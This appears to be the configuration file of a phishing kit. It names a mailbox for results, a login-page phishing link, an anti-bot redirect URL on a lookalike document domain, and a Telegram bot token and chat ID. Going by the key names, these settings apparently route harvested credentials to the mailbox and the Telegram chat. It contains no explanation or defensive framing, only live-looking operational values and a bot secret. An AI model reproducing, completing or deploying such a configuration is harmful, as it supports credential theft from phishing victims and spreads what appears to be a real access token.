MAIL_RESULT=jacksrodney@yandex.com
LINK_URL=https://login.kmcfilsonsolution.com/FwaPhpjB
LINK_ANTIBOT=https://documencompany.takimrisowes.online/login/
TOKEN=5886667026:AAHMRZh4RSjsqaXNwPgZjOJ_W-ffDM5PpIE
CHAT_ID=915867987
